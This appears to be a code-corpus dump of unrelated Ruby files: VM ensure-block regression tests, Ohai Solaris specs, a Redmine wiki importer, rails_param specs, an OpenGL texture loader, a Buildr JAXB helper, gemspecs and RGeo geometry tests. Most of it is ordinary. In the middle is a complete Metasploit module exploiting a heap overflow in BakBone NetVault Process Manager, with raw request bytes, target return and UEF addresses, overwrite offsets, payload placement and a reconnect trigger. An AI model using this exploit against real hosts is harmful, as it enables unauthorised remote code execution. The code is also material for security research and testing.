def test
while true
return
end
ensure
puts("ENSURE")
end
test
}, '[ruby-dev:37967]'
[['[ruby-core:28129]', %q{
class Bug2728
include Enumerable
define_method(:dynamic_method) do
"dynamically defined method"
end
def each
begin
yield :foo
ensure
dynamic_method
end
end
end
e = Bug2728.new
}],
['[ruby-core:28132]', %q{
class Bug2729
include Enumerable
def each
begin
yield :foo
ensure
proc {}.call
end
end
end
e = Bug2729.new
}],
['[ruby-core:39125]', %q{
class Bug5234
include Enumerable
def each
begin
yield :foo
ensure
proc
end
end
end
e = Bug5234.new
}],
['[ruby-dev:45656]', %q{
class Bug6460
include Enumerable
def each
begin
yield :foo
ensure
1.times { Proc.new }
end
end
end
e = Bug6460.new
}]].each do |bug, src|
assert_equal "foo", src + %q{e.detect {true}}, bug
assert_equal "true", src + %q{e.any? {true}}, bug
assert_equal "false", src + %q{e.all? {false}}, bug
assert_equal "true", src + %q{e.include?(:foo)}, bug
end
assert_equal "foo", %q{
class Bug6460
def m1
m2 {|e|
return e
}
end
def m2
begin
yield :foo
ensure
begin
begin
yield :foo
ensure
Proc.new
raise ''
end
rescue
end
end
end
end
Bug6460.new.m1
}, '[ruby-dev:46372]'
| 21.97973 | 280 | 0.40747 |
1c813f7215944ec6871e7536de36774cd3b5d9f3 | 3,061 | #
# Author:: Trevor O (<[email protected]>)
# Copyright:: Copyright (c) 2009-2016 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require File.expand_path(File.dirname(__FILE__) + "/../../../spec_helper.rb")
describe Ohai::System, "Solaris plugin platform" do
before(:each) do
@plugin = get_plugin("solaris2/platform")
allow(@plugin).to receive(:collect_os).and_return(:solaris2)
allow(@plugin).to receive(:shell_out).with("/sbin/uname -X")
end
describe "on SmartOS" do
before(:each) do
@uname_x = <<-UNAME_X
System = SunOS
Node = node.example.com
Release = 5.11
KernelID = joyent_20120130T201844Z
Machine = i86pc
BusType = <unknown>
Serial = <unknown>
Users = <unknown>
OEM# = 0
Origin# = 1
NumCPU = 16
UNAME_X
allow(File).to receive(:exists?).with("/sbin/uname").and_return(true)
allow(@plugin).to receive(:shell_out).with("/sbin/uname -X").and_return(mock_shell_out(0, @uname_x, ""))
@release = StringIO.new(" SmartOS 20120130T201844Z x86_64\n")
allow(File).to receive(:open).with("/etc/release").and_yield(@release)
end
it "should run uname and set platform and build" do
@plugin.run
expect(@plugin[:platform_build]).to eq("joyent_20120130T201844Z")
end
it "should set the platform" do
@plugin.run
expect(@plugin[:platform]).to eq("smartos")
end
it "should set the platform_version" do
@plugin.run
expect(@plugin[:platform_version]).to eq("5.11")
end
end
describe "on Solaris 11" do
before(:each) do
@uname_x = <<-UNAME_X
System = SunOS
Node = node.example.com
Release = 5.11
KernelID = 11.1
Machine = i86pc
BusType = <unknown>
Serial = <unknown>
Users = <unknown>
OEM# = 0
Origin# = 1
NumCPU = 1
UNAME_X
allow(File).to receive(:exists?).with("/sbin/uname").and_return(true)
allow(@plugin).to receive(:shell_out).with("/sbin/uname -X").and_return(mock_shell_out(0, @uname_x, ""))
@release = StringIO.new(" Oracle Solaris 11.1 X86\n")
allow(File).to receive(:open).with("/etc/release").and_yield(@release)
end
it "should run uname and set platform and build" do
@plugin.run
expect(@plugin[:platform_build]).to eq("11.1")
end
it "should set the platform" do
@plugin.run
expect(@plugin[:platform]).to eq("solaris2")
end
it "should set the platform_version" do
@plugin.run
expect(@plugin[:platform_version]).to eq("5.11")
end
end
end
| 28.082569 | 110 | 0.671023 |
01587c6a433be8498add2effade618da616b1e7d | 3,251 | require 'caramelize/input_wiki/wiki'
require 'caramelize/filters/swap_wiki_links'
require 'caramelize/filters/remove_table_tab_line_endings'
module Caramelize
module InputWiki
class RedmineWiki < Wiki
include DatabaseConnector
def initialize(options = {})
super(options)
@options[:markup] = :textile
@options[:filters] << Caramelize::SwapWikiLinks
@options[:filters] << Caramelize::RemoveTableTabLineEndings
@options[:create_namespace_overview] = true
end
# after calling this action, I expect the titles and revisions to be filled
def read_pages
add_projects_as_namespaces
pages.each do |row_page|
build_page(row_page)
end
titles.uniq!
revisions.sort! { |a,b| a.time <=> b.time }
revisions
end
def read_authors
results = database.query(authors_query)
results.each do |row|
authors[row["id"]] = OpenStruct.new(id: row["id"],
name: row["login"],
email: row["mail"])
end
authors
end
private
def build_page(row_page)
results_contents = database.query(single_page_query(row_page['id']))
wiki = wikis.select{ |row| row['id'] == row_page['wiki_id'] }.first
project_identifier = ''
if wiki
project = projects.select{ |row| row['id'] == wiki['project_id'] }.first
project_identifier = project['identifier'] + '/'
end
title = project_identifier + row_page['title']
titles << title
results_contents.each do |row_content|
page = Page.new(build_properties(title, row_content))
revisions << page
end
end
def add_projects_as_namespaces
projects.each do |row_project|
namespace = OpenStruct.new(identifier: row_project['identifier'],
name: row_project['name'])
namespaces << namespace
end
end
def authors_query
'SELECT id, login, mail FROM users;'
end
def single_page_query(page_id)
"SELECT * FROM wiki_content_versions WHERE page_id='#{page_id}' ORDER BY updated_on;"
end
def projects_query
'SELECT id, identifier, name FROM projects;'
end
def pages_query
'SELECT id, title, wiki_id FROM wiki_pages;'
end
def wikis_query
'SELECT id, project_id FROM wikis;'
end
def pages
@pages ||= database.query(pages_query)
end
def projects
@projects ||= database.query(projects_query)
end
def wikis
@wikis ||= database.query(wikis_query)
end
def build_properties(title, row_content)
author = authors.fetch(row_content["author_id"], nil)
{
id: row_content['id'],
title: title,
body: row_content['data'],
markup: :textile,
latest: false,
time: row_content['updated_on'],
message: row_content['comments'],
author: author,
author_name: author.name
}
end
end
end
end
| 26.867769 | 93 | 0.579514 |
1d1224c456e02a7129ee033e931baf4f1cc0b069 | 2,654 | require 'fixtures/controllers'
require 'rspec/rails'
describe FakeController, type: :controller do
describe "type coercion" do
it "coerces to integer" do
get :index, page: "666"
expect(controller.params[:page]).to eql(666)
end
end
describe "nested_hash" do
it "validates nested properties" do
params = {
'book' => {
'title' => 'One Hundred Years of Solitude',
'author' => {
'first_name' => 'Garbriel Garcia',
'last_name' => 'Marquez',
'age' => '70'
},
'price' => '$1,000.00'
}}
get :edit, params
expect(controller.params[:book][:author][:age]).to eql 70
expect(controller.params[:book][:author][:age]).to be_kind_of Integer
expect(controller.params[:book][:price]).to eql 1000.0
expect(controller.params[:book][:price]).to be_instance_of BigDecimal
end
it "raises error when required nested attribute missing" do
params = {
'book' => {
'title' => 'One Hundred Years of Solitude',
'author' => {
'last_name' => 'Marquez',
'age' => '70'
},
'price' => '$1,000.00'
}}
expect { get :edit, params }.to raise_error { |error|
expect(error).to be_a(RailsParam::Param::InvalidParameterError)
expect(error.param).to eql("first_name")
expect(error.options).to eql({:required => true})
}
end
it "passes when hash that's not required but has required attributes is missing" do
params = {
'book' => {
'title' => 'One Hundred Years of Solitude',
'price' => '$1,000.00'
}}
get :edit, params
expect(controller.params[:book][:price]).to eql 1000.0
expect(controller.params[:book][:price]).to be_instance_of BigDecimal
end
end
describe "InvalidParameterError" do
it "raises an exception with params attributes" do
expect { get :index, sort: "foo" }.to raise_error { |error|
expect(error).to be_a(RailsParam::Param::InvalidParameterError)
expect(error.param).to eql("sort")
expect(error.options).to eql({:in => ["asc", "desc"], :default => "asc", :transform => :downcase})
}
end
end
describe ":transform parameter" do
it "applies transformations" do
get :index, sort: "ASC"
expect(controller.params[:sort]).to eql("asc")
end
end
describe "default values" do
it "applies default values" do
get :index
expect(controller.params[:page]).to eql(1)
expect(controller.params[:sort]).to eql("asc")
end
end
end
| 30.159091 | 106 | 0.585531 |
acf439d876b943e04a280a4f917d297746cae1af | 1,396 | require 'RMagick'
require 'ruby3d/core/settings'
module Ruby3d::Assets
class Texture
attr_accessor :file_name
attr_accessor :id
attr_accessor :width
attr_accessor :height
attr_accessor :texture_id
def initialize(file_name)
@assets_config = Ruby3d::Core::Settings::Settings.instance.asset_settings
paths = @assets_config.paths
paths.each do |p|
@file_name = p + '/' + file_name
break if File::exist?(@file_name)
end
raise AssetError.new("The texture #{@file_name} couldn't be found") unless File::exist?(@file_name)
@id = file_name
img = Magick::Image::read(@file_name)[0]
@width = img.columns
@height = img.rows
data = img.export_pixels_to_str(0, 0, img.columns, img.rows, 'RGB', Magick::FloatPixel)
@texture_id = glGenTextures(1).first
glBindTexture(GL_TEXTURE_2D, @texture_id)
glTexImage2D(GL_TEXTURE_2D, 0, 3, @width, @height, 0, GL_RGB, GL_FLOAT, data)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR_MIPMAP_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)
gluBuild2DMipmaps(GL_TEXTURE_2D, GL_RGBA, @width, @height, GL_RGB, GL_FLOAT, data)
img.destroy!
end
end
end | 36.736842 | 105 | 0.704155 |
bb6ec285d528eacc706c850035e4cf125fad76cf | 2,470 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with this
# work for additional information regarding copyright ownership. The ASF
# licenses this file to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
module Buildr
module JaxbXjc
class << self
def jaxb_version
'2.2.1'
end
# The specs for requirements
def dependencies
[
"javax.xml.bind:jaxb-api:jar:#{jaxb_version}",
"com.sun.xml.bind:jaxb-impl:jar:#{jaxb_version}",
"com.sun.xml.bind:jaxb-xjc:jar:#{jaxb_version}"
]
end
# Repositories containing the requirements
def remote_repository
'http://download.java.net/maven/2'
end
def xjc(*args)
cp = Buildr.artifacts(self.dependencies).each(&:invoke).map(&:to_s)
Java::Commands.java 'com.sun.tools.xjc.XJCFacade', *(args + [{ :classpath => cp }])
end
end
def compile_jaxb(files, *args)
options = Hash === args.last ? args.pop.dup : {}
rake_check_options options, :directory, :keep_content, :package, :id
args = args.dup
files = Array === files ? files.flatten : [files]
target_dir = File.expand_path(options[:directory] || _(:target, :generated, :jaxb, 'main/java'))
timestamp_file = File.expand_path("#{target_dir}/jaxb-#{options[:id] || 1}.cache")
project.iml.main_generated_source_directories << target_dir if project.iml?
file(target_dir => timestamp_file)
file(timestamp_file => files.flatten) do |task|
rm_rf target_dir unless options[:keep_content]
mkdir_p target_dir
args << '-d' << target_dir
args << '-p' << options[:package] if options[:package]
args += files.collect{|f| f.to_s}
JaxbXjc.xjc args
touch timestamp_file
end
target_dir
end
end
end
class Buildr::Project
include Buildr::JaxbXjc
end
| 32.933333 | 102 | 0.665992 |
2680f3e764b094571478c6d8e16a9ed293d1603b | 1,749 | require File.expand_path('../lib/avatax/version', __FILE__)
Gem::Specification.new do |s|
s.add_development_dependency('rake', '~> 12.0.0')
s.add_development_dependency('rspec', '~> 3.5.0')
s.add_development_dependency('webmock', '>= 2.0.0')
s.add_development_dependency('pry')
s.add_runtime_dependency('faraday', '>= 0.10')
s.add_runtime_dependency('faraday_middleware', '>= 0.10')
s.add_runtime_dependency('multi_json', '>= 1.0.3')
s.add_runtime_dependency('faraday_middleware-parse_oj', '~> 0.3.2')
s.authors = ["Marcus Vorwaller"]
s.description = %q{A Ruby wrapper for the AvaTax REST and Search APIs}
s.post_install_message =<<eos
********************************************************************************
AvaTax REST API
------------------------------
Our developer site documents the AvaTax REST API.
(http://developer.avatax.com).
Blog
----------------------------
The Developer Blog is a great place to learn more about the API and AvaTax integrations
Subscribe to the RSS feed be notified of new posts:
(http://developer.avatax.com/blog).
********************************************************************************
eos
s.email = ['[email protected]']
s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
s.files = `git ls-files`.split("\n")
s.homepage = 'https://github.com/avadev/AvaTax-REST-V2-Ruby-SDK'
s.name = 'avatax'
s.platform = Gem::Platform::RUBY
s.require_paths = ['lib']
s.required_rubygems_version = Gem::Requirement.new('>= 2.0.0') if s.respond_to? :required_rubygems_version=
s.summary = %q{Ruby wrapper for the AvaTax API}
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.version = AvaTax::VERSION.dup
end
| 42.658537 | 109 | 0.619211 |
1a8c987ce0f162959d6a84a5325542a2b17b4747 | 714 | require 'test_helper'
class MicropostTest < ActiveSupport::TestCase
def setup
@user = users(:michael)
@micropost = @user.microposts.build(content: "Lorem ipsum")
end
test "should be valid" do
assert @micropost.valid?
end
test "user id should be present" do
@micropost.user_id = nil
assert_not @micropost.valid?
end
test "content should be present" do
@micropost.content = " "
assert_not @micropost.valid?
end
test "content should be at most 140 characters" do
@micropost.content = "a" * 141
assert_not @micropost.valid?
end
test "order should be most recent first" do
assert_equal microposts(:most_recent), Micropost.first
end
end | 20.4 | 63 | 0.684874 |
3322a421dbfd67ea32cd1b36825d715438df6368 | 107 | Rails.application.routes.draw do
mount StimulusReflexProfiler::Engine => "/stimulus_reflex_profiler"
end
| 26.75 | 69 | 0.82243 |
f8d0bdda9b091453a17387883c397e78f4aea654 | 8,735 | # -----------------------------------------------------------------------------
#
# Common tests for geometry collection implementations
#
# -----------------------------------------------------------------------------
require 'rgeo'
module RGeo
module Tests # :nodoc:
module Common # :nodoc:
module GeometryCollectionTests # :nodoc:
def setup
@factory = create_factory
@point1 = @factory.point(0, 0)
@point2 = @factory.point(1, 0)
@point3 = @factory.point(-4, 2)
@point4 = @factory.point(-5, 3)
@line1 = @factory.line_string([@point3, @point4])
@line2 = @factory.line_string([@point3, @point4, @point1])
@line3 = @factory.line(@point3, @point4)
end
def test_creation_simple
geom_ = @factory.collection([@point1, @line1])
assert_not_nil(geom_)
assert(::RGeo::Feature::GeometryCollection === geom_)
assert_equal(::RGeo::Feature::GeometryCollection, geom_.geometry_type)
assert_equal(2, geom_.num_geometries)
assert(@point1.eql?(geom_[0]))
assert(@line1.eql?(geom_[1]))
end
def test_creation_empty
geom_ = @factory.collection([])
assert_not_nil(geom_)
assert(::RGeo::Feature::GeometryCollection === geom_)
assert_equal(::RGeo::Feature::GeometryCollection, geom_.geometry_type)
assert_equal(0, geom_.num_geometries)
assert_equal([], geom_.to_a)
end
def test_bounds_check
geom_ = @factory.collection([@point1, @line1])
assert_nil(geom_.geometry_n(200))
assert_nil(geom_.geometry_n(-1))
assert(@line1.eql?(geom_[-1]))
end
def test_creation_save_klass
geom_ = @factory.collection([@point1, @line3])
assert_not_nil(geom_)
assert(::RGeo::Feature::GeometryCollection === geom_)
assert_equal(::RGeo::Feature::GeometryCollection, geom_.geometry_type)
assert_equal(2, geom_.num_geometries)
assert(geom_[1].eql?(@line3))
end
def test_creation_compound
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point2, geom1_])
assert_not_nil(geom2_)
assert(::RGeo::Feature::GeometryCollection === geom2_)
assert_equal(::RGeo::Feature::GeometryCollection, geom2_.geometry_type)
assert_equal(2, geom2_.num_geometries)
assert(geom2_[1].eql?(geom1_))
end
def test_creation_compound_save_klass
geom1_ = @factory.collection([@point1, @line3])
geom2_ = @factory.collection([@point2, geom1_])
::GC.start
assert_not_nil(geom2_)
assert(::RGeo::Feature::GeometryCollection === geom2_)
assert_equal(::RGeo::Feature::GeometryCollection, geom2_.geometry_type)
assert_equal(2, geom2_.num_geometries)
assert_equal(::RGeo::Feature::Line, geom2_[1][1].geometry_type)
end
def test_required_equivalences
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point1, @line1])
assert(geom1_.eql?(geom2_))
assert(geom1_ == geom2_)
end
def test_fully_equal
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point1, @line1])
assert(geom1_.rep_equals?(geom2_))
assert(geom1_.equals?(geom2_))
end
def test_geometrically_equal
geom1_ = @factory.collection([@point2, @line2])
geom2_ = @factory.collection([@point2, @line1, @line2])
assert(!geom1_.rep_equals?(geom2_))
assert(geom1_.equals?(geom2_))
end
def test_empty_equal
geom1_ = @factory.collection([])
geom2_ = @factory.collection([])
assert(geom1_.rep_equals?(geom2_))
assert(geom1_.equals?(geom2_))
end
def test_not_equal
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point2, @line1])
assert(!geom1_.rep_equals?(geom2_))
assert(!geom1_.equals?(geom2_))
end
def test_hashes_equal_for_representationally_equivalent_objects
geom1_ = @factory.collection([@point1, @line1])
geom2_ = @factory.collection([@point1, @line1])
assert_equal(geom1_.hash, geom2_.hash)
end
def test_nested_equality
geom1_ = @factory.collection([@line1, @factory.collection([@point1, @point2])])
geom2_ = @factory.collection([@line1, @factory.collection([@point1, @point2])])
assert(geom1_.rep_equals?(geom2_))
assert_equal(geom1_.hash, geom2_.hash)
end
def test_out_of_order_is_not_equal
geom1_ = @factory.collection([@line1, @point2])
geom2_ = @factory.collection([@point2, @line1])
assert(!geom1_.rep_equals?(geom2_))
assert_not_equal(geom1_.hash, geom2_.hash)
end
def test_wkt_creation_simple
parsed_geom_ = @factory.parse_wkt('GEOMETRYCOLLECTION(POINT(0 0), LINESTRING(-4 2, -5 3))')
built_geom_ = @factory.collection([@point1, @line1])
assert(built_geom_.eql?(parsed_geom_))
end
def test_wkt_creation_empty
parsed_geom_ = @factory.parse_wkt('GEOMETRYCOLLECTION EMPTY')
assert_equal(0, parsed_geom_.num_geometries)
assert_equal([], parsed_geom_.to_a)
end
def test_clone
geom1_ = @factory.collection([@point1, @line1])
geom2_ = geom1_.clone
assert(geom1_.eql?(geom2_))
assert_equal(::RGeo::Feature::GeometryCollection, geom2_.geometry_type)
assert_equal(2, geom2_.num_geometries)
assert(@point1.eql?(geom2_[0]))
assert(@line1.eql?(geom2_[1]))
end
def test_type_check
geom1_ = @factory.collection([@point1, @line1])
assert(::RGeo::Feature::Geometry.check_type(geom1_))
assert(!::RGeo::Feature::Point.check_type(geom1_))
assert(::RGeo::Feature::GeometryCollection.check_type(geom1_))
assert(!::RGeo::Feature::MultiPoint.check_type(geom1_))
geom2_ = @factory.collection([@point1, @point2])
assert(::RGeo::Feature::Geometry.check_type(geom2_))
assert(!::RGeo::Feature::Point.check_type(geom2_))
assert(::RGeo::Feature::GeometryCollection.check_type(geom2_))
assert(!::RGeo::Feature::MultiPoint.check_type(geom2_))
end
def test_as_text_wkt_round_trip
geom1_ = @factory.collection([@point1, @line1])
text_ = geom1_.as_text
geom2_ = @factory.parse_wkt(text_)
assert(geom1_.eql?(geom2_))
end
def test_as_binary_wkb_round_trip
geom1_ = @factory.collection([@point1, @line1])
binary_ = geom1_.as_binary
geom2_ = @factory.parse_wkb(binary_)
assert(geom1_.eql?(geom2_))
end
def test_dimension
geom1_ = @factory.collection([@point1, @line1])
assert_equal(1, geom1_.dimension)
geom2_ = @factory.collection([@point1, @point2])
assert_equal(0, geom2_.dimension)
geom3_ = @factory.collection([])
assert_equal(-1, geom3_.dimension)
end
def test_is_empty
geom1_ = @factory.collection([@point1, @line1])
assert(!geom1_.is_empty?)
geom2_ = @factory.collection([])
assert(geom2_.is_empty?)
end
def test_empty_collection_envelope
empty_ = @factory.collection([])
envelope_ = empty_.envelope
assert_equal(Feature::GeometryCollection, envelope_.geometry_type)
assert_equal(0, envelope_.num_geometries)
end
def test_empty_collection_boundary
empty_ = @factory.collection([])
assert_nil(empty_.boundary)
end
def test_each_block
geom1_ = @factory.collection([@point1, @line1])
i_ = 0
geom1_.each do |g_|
if i_ == 0
assert_equal(@point1, g_)
else
assert_equal(@line1, g_)
end
i_ += 1
end
end
def test_each_enumerator
geom1_ = @factory.collection([@point1, @line1])
enum_ = geom1_.each
assert_equal(@point1, enum_.next)
assert_equal(@line1, enum_.next)
assert_raise(::StopIteration) do
enum_.next
end
end
end
end
end
end
| 32.232472 | 101 | 0.587293 |
79110358ac6401c98bca082ee70d72d46b7a0076 | 2,094 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => 'public, max-age=172800'
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
config.action_mailer.raise_delivery_errors = true
config.action_mailer.delivery_method = :test
host = 'localhost:3000' # Don't use this literally; use your local dev host instead
config.action_mailer.default_url_options = { host: host, protocol: 'https' }
# Don't care if the mailer can't send.
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.491525 | 85 | 0.7617 |
acdd68ab009eafba42582e261f6eac98f16f82c1 | 2,548 | # -*- encoding: utf-8 -*-
# stub: dnsruby 1.61.3 ruby lib
Gem::Specification.new do |s|
s.name = "dnsruby".freeze
s.version = "1.61.3"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Alex Dalitz".freeze]
s.date = "2019-08-15"
s.description = "Dnsruby is a pure Ruby DNS client library which implements a\nstub resolver. It aims to comply with all DNS RFCs, including\nDNSSEC NSEC3 support.".freeze
s.email = "[email protected]".freeze
s.extra_rdoc_files = ["DNSSEC".freeze, "EXAMPLES".freeze, "README.md".freeze, "EVENTMACHINE".freeze]
s.files = ["DNSSEC".freeze, "EVENTMACHINE".freeze, "EXAMPLES".freeze, "README.md".freeze]
s.homepage = "https://github.com/alexdalitz/dnsruby".freeze
s.licenses = ["Apache License, Version 2.0".freeze]
s.post_install_message = "Installing dnsruby...\n For issues and source code: https://github.com/alexdalitz/dnsruby\n For general discussion (please tell us how you use dnsruby): https://groups.google.com/forum/#!forum/dnsruby".freeze
s.rubygems_version = "3.1.3".freeze
s.summary = "Ruby DNS(SEC) implementation".freeze
s.installed_by_version = "3.1.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_development_dependency(%q<pry-byebug>.freeze, ["~> 2.0"])
s.add_development_dependency(%q<rake>.freeze, ["~> 10", ">= 10.3.2"])
s.add_development_dependency(%q<minitest>.freeze, ["~> 5.4"])
s.add_development_dependency(%q<rubydns>.freeze, ["~> 2.0.1"])
s.add_development_dependency(%q<nio4r>.freeze, ["~> 2.0"])
s.add_development_dependency(%q<minitest-display>.freeze, [">= 0.3.0"])
s.add_development_dependency(%q<coveralls>.freeze, ["~> 0.7"])
s.add_runtime_dependency(%q<addressable>.freeze, ["~> 2.5"])
else
s.add_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_dependency(%q<pry-byebug>.freeze, ["~> 2.0"])
s.add_dependency(%q<rake>.freeze, ["~> 10", ">= 10.3.2"])
s.add_dependency(%q<minitest>.freeze, ["~> 5.4"])
s.add_dependency(%q<rubydns>.freeze, ["~> 2.0.1"])
s.add_dependency(%q<nio4r>.freeze, ["~> 2.0"])
s.add_dependency(%q<minitest-display>.freeze, [">= 0.3.0"])
s.add_dependency(%q<coveralls>.freeze, ["~> 0.7"])
s.add_dependency(%q<addressable>.freeze, ["~> 2.5"])
end
end
| 50.96 | 238 | 0.681319 |
bbdef324e989f0a92df7834ba974c34d893550c5 | 4,718 | ##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'BakBone NetVault Remote Heap Overflow',
'Description' => %q{
This module exploits a heap overflow in the BakBone NetVault
Process Manager service. This code is a direct port of the netvault.c
code written by nolimit and BuzzDee.
},
'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2005-1009'],
['OSVDB', '15234'],
['BID', '12967'],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x20",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 01 2005'
))
register_options(
[
Opt::RPORT(20031)
], self.class)
end
def check
connect
hname = "METASPLOIT"
probe =
"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +
[ hname.length + 1 ].pack('V') + hname + "\x00"
probe += "\x00" * (201 - probe.length)
sock.put(probe)
res = sock.get_once(1, 10)
off = (res || '').index("NVBuild")
if off
off += 21
ver = res[off + 4, res[off, 4].unpack('V')[0]].to_i
if ver > 0
print_status("Detected NetVault Build #{ver}")
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Trying target #{target.name}...")
head =
"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
"\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +
"\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +
"\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +
"\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +
"\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +
"\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +
"\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +
"\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"
pattern = make_nops(39947) + "\x00\x00\x00"
p = payload.encoded
pattern[0, head.length] = head
pattern[32790, 2] = "\xeb\x0a"
pattern[32792, 4] = [ target.ret ].pack('V')
pattern[32796, 4] = [ target['UEF'] ].pack('V')
pattern[32800, p.length] = p
sent = 0
try = 0
15.times {
try += 1
connect
sent = sock.put(pattern)
disconnect
break if sent == pattern.length
}
if (try == 15)
print_error("Could not write full packet to server.")
return
end
print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
select(nil,nil,nil,4)
print_status("Attempting to trigger memory overwrite by reconnecting...")
begin
10.times { |x|
connect
sock.put(pattern)
print_status(" Completed connection #{x}")
sock.get_once(1, 1)
disconnect
}
rescue
end
print_status("Waiting for payload to execute...")
handler
disconnect
end
def wfs_delay
5
end
end | 28.768293 | 84 | 0.60195 |
abed0c36ea77ddd6e0cc0bf7dcc91975b4bfef5f | 187 | module Graviga
module Types
class IDType < ScalarType
def serialize(value)
value.to_s
end
def parse(value)
value.to_s
end
end
end
end
| 13.357143 | 29 | 0.57754 |
